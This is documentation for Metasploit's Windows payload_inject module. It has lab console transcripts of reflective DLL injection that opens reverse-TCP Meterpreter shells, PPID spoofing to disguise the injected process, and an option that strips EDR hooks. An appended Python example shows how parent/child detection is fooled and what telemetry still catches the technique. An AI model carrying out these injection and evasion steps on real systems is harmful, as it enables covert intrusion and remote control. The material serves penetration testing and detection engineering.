
Payload Inject

documentation/modules/exploit/windows/local/payload_inject.md


Description

This module uses the reflective DLL injection technique to spawn a payload thread in the memory of another running process. To inject into another process, the meterpreter session must have the permissions required to allocate memory in that process and create a remote thread in it. The architecture of the payload must match the architecture of the process into which it is injected. If no process is specified, the module launches a notepad process matching the architecture of the selected payload and then injects into it.

Side-Effects

The PPID option can crash certain processes when used. To use the PPID feature, the meterpreter session must have permission to access the process identified by the PPID, and that process may also have attributes that limit its use as a spoofed parent. Certain Windows Metro apps, such as Calc or Edge, will crash if you try to use them as the PPID.

Options

msf exploit(windows/local/payload_inject) > show options

Module options (exploit/windows/local/payload_inject):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   AUTOUNHOOK   false            no        Auto remove EDRs hooks
   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
   PPID         3632             no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   SESSION      1                yes       The session to run this module on.
   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed

Vulnerable Target

This module only works on Windows hosts.

Usage

  1. Create a meterpreter session on the remote host
  2. Begin interacting with the module: use exploit/windows/local/payload_inject.
  3. Set the PAYLOAD and configure it correctly.
  4. If an existing handler is configured to receive the elevated session, then the module's handler should be disabled: set DisablePayloadHandler true. Make sure that the SESSION value is set to the existing session identifier.
  5. Invoke the module: run.

Scenarios

Windows 10 x64 Build 17134 No PID

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.168:5555
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 1 opened (192.168.135.168:5555 -> 192.168.132.125:49673) at 2020-01-22 13:10:13 -0600
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/windows/local/payload_inject
msf exploit(windows/local/payload_inject) > show options

Module options (exploit/windows/local/payload_inject):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   AUTOUNHOOK   false            no        Auto remove EDRs hooks
   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
   PPID         0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   SESSION                       yes       The session to run this module on.
   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf exploit(windows/local/payload_inject) > set session 1
session => 1
msf exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/payload_inject) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf exploit(windows/local/payload_inject) > show options

Module options (exploit/windows/local/payload_inject):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   AUTOUNHOOK   false            no        Auto remove EDRs hooks
   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
   PPID         0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   SESSION      1                yes       The session to run this module on.
   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf exploit(windows/local/payload_inject) > run

[*] Started reverse TCP handler on 192.168.135.168:4444
[*] Running module against DESKTOP-D1E425Q
[*] Spawned Notepad process 684
[*] Injecting payload into 684
[*] Preparing 'windows/x64/meterpreter/reverse_tcp' for PID 684
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49676) at 2020-01-22 13:12:07 -0600

meterpreter > ps

Process List
============

 PID   PPID  Name                         Arch  Session  User                     Path
 ---   ----  ----                         ----  -------  ----                     ----
 0     0     [System Process]
 4     0     System
 88    4     Registry
.
.
.
 684   7524  notepad.exe                  x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\System32\notepad.exe
.
.
.
 7524  3632  revtcpx64.exe                x64   1        DESKTOP-D1E425Q\msfuser  C:\Users\msfuser\Desktop\revtcpx64.exe
 7532  4772  chrome.exe                   x64   1        DESKTOP-D1E425Q\msfuser  C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 7876  780   WmiPrvSE.exe
 7904  780   WmiPrvSE.exe
 8000  584   svchost.exe
 8036  584   svchost.exe

meterpreter > getpid
Current pid: 684
meterpreter >

Windows 10 x64 Build 17134 No PID, PPID spoofing

msf exploit(windows/local/payload_inject) > set PPID 3632
PPID => 3632
msf exploit(windows/local/payload_inject) > show options

Module options (exploit/windows/local/payload_inject):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   AUTOUNHOOK   false            no        Auto remove EDRs hooks
   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
   PPID         3632             no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   SESSION      1                yes       The session to run this module on.
   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf exploit(windows/local/payload_inject) > run

[*] Started reverse TCP handler on 192.168.135.168:4444
[*] Running module against DESKTOP-D1E425Q
[*] Spawned Notepad process 1528
[*] Spoofing PPID 3632
[*] Injecting payload into 1528
[*] Preparing 'windows/x64/meterpreter/reverse_tcp' for PID 1528
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49677) at 2020-01-22 13:16:31 -0600

meterpreter > getpid
Current pid: 1528
meterpreter > ps

Process List
============

 PID   PPID  Name                         Arch  Session  User                     Path
 ---   ----  ----                         ----  -------  ----                     ----
 0     0     [System Process]
 4     0     System
 88    4     Registry
.
.
.
 1528  3632  notepad.exe                  x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\System32\notepad.exe
.
.
.
 3632  3452  explorer.exe                 x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\explorer.exe
.
.
.
 7524  3632  revtcpx64.exe                x64   1        DESKTOP-D1E425Q\msfuser  C:\Users\msfuser\Desktop\revtcpx64.exe
 7532  4772  chrome.exe                   x64   1        DESKTOP-D1E425Q\msfuser  C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 7904  780   WmiPrvSE.exe
 7996  780   RuntimeBroker.exe            x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\System32\RuntimeBroker.exe
 8000  584   svchost.exe
 8036  584   svchost.exe

meterpreter >
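The two `ps` listings above show what PPID spoofing does to the process tree a defender sees: in the first scenario the injected notepad.exe (684) has revtcpx64.exe as its parent, while in the second scenario notepad.exe (1528) appears to have been started by explorer.exe (3632). The following added example (not part of the module or of Metasploit) implements a simple parent/child baseline check over process listings in the same column layout, using constructed sample data modelled on the two scenarios, and shows that the check fires on the first listing but not on the second. The `EXPECTED_PARENTS` baseline and the sample rows are assumptions made for the example.

```python
"""Parent/child baseline check over Meterpreter-style `ps` output.

Added defensive example; not part of the payload_inject module or of the
Metasploit Framework. The two process listings below are constructed to
mirror the scenarios documented on this page (PIDs and names only; the
other columns are kept so the parser handles the real layout).
"""
import re
from dataclasses import dataclass

# Hypothetical baseline: which parent images are normal for a child image.
# A real baseline would be built from the environment's own telemetry.
EXPECTED_PARENTS = {
    "notepad.exe": {"explorer.exe", "svchost.exe"},
}


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str


# Matches the leading "PID  PPID  Name" columns of a data row; the header,
# the dashed underline and the "." filler lines do not match.
_ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S+)")


def parse_ps(text):
    """Return {pid: Proc} for every data row in a `ps` listing."""
    procs = {}
    for line in text.splitlines():
        m = _ROW.match(line)
        if not m:
            continue
        pid, ppid, name = int(m.group(1)), int(m.group(2)), m.group(3)
        procs[pid] = Proc(pid, ppid, name)
    return procs


def ancestry(procs, pid, limit=16):
    """Walk the PPID chain from pid upwards, stopping at unknown PIDs or cycles."""
    chain, seen = [], set()
    while pid in procs and pid not in seen and len(chain) < limit:
        seen.add(pid)
        chain.append(procs[pid].name)
        pid = procs[pid].ppid
    return chain


def unexpected_parents(procs):
    """Return (child, child_pid, parent, parent_pid) for children whose parent
    image is not in the baseline. Images without a baseline entry are skipped."""
    findings = []
    for p in procs.values():
        allowed = EXPECTED_PARENTS.get(p.name.lower())
        if allowed is None:
            continue
        parent = procs.get(p.ppid)
        parent_name = parent.name.lower() if parent else "<unknown>"
        if parent_name not in allowed:
            findings.append((p.name, p.pid, parent_name, p.ppid))
    return findings


# Constructed sample: scenario 1 (no PPID spoofing). notepad.exe was
# created by the implant, so the recorded parent is revtcpx64.exe.
SCENARIO_NO_PPID = r"""
 PID   PPID  Name                         Arch  Session  User                     Path
 ---   ----  ----                         ----  -------  ----                     ----
 0     0     [System Process]
 4     0     System
 684   7524  notepad.exe                  x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\System32\notepad.exe
 3632  3452  explorer.exe                 x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\explorer.exe
 7524  3632  revtcpx64.exe                x64   1        DESKTOP-D1E425Q\msfuser  C:\Users\msfuser\Desktop\revtcpx64.exe
"""

# Constructed sample: scenario 2 (PPID 3632). The same implant created
# notepad.exe, but the recorded parent is now explorer.exe.
SCENARIO_PPID_SPOOF = r"""
 PID   PPID  Name                         Arch  Session  User                     Path
 ---   ----  ----                         ----  -------  ----                     ----
 0     0     [System Process]
 4     0     System
 1528  3632  notepad.exe                  x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\System32\notepad.exe
 3632  3452  explorer.exe                 x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\explorer.exe
 7524  3632  revtcpx64.exe                x64   1        DESKTOP-D1E425Q\msfuser  C:\Users\msfuser\Desktop\revtcpx64.exe
"""

if __name__ == "__main__":
    for label, listing in (("no PPID", SCENARIO_NO_PPID), ("PPID 3632", SCENARIO_PPID_SPOOF)):
        procs = parse_ps(listing)
        print(f"[{label}] findings: {unexpected_parents(procs)}")
        notepad_pid = next(p.pid for p in procs.values() if p.name == "notepad.exe")
        print(f"[{label}] ancestry of notepad.exe: {' <- '.join(ancestry(procs, notepad_pid))}")
```

Run stand-alone, the first listing yields one finding (notepad.exe 684 parented by revtcpx64.exe) and an ancestry chain that passes through the implant, while the second listing yields no finding and a chain that goes straight to explorer.exe. That is the point for detection engineering: a parent/child heuristic that only looks at the recorded PPID is defeated by this option. Telemetry that records the creating thread separately from the nominal parent (the kernel process-creation callback exposes both), or that watches for the cross-process memory allocation and remote thread creation the Description section requires, does not depend on the PPID field.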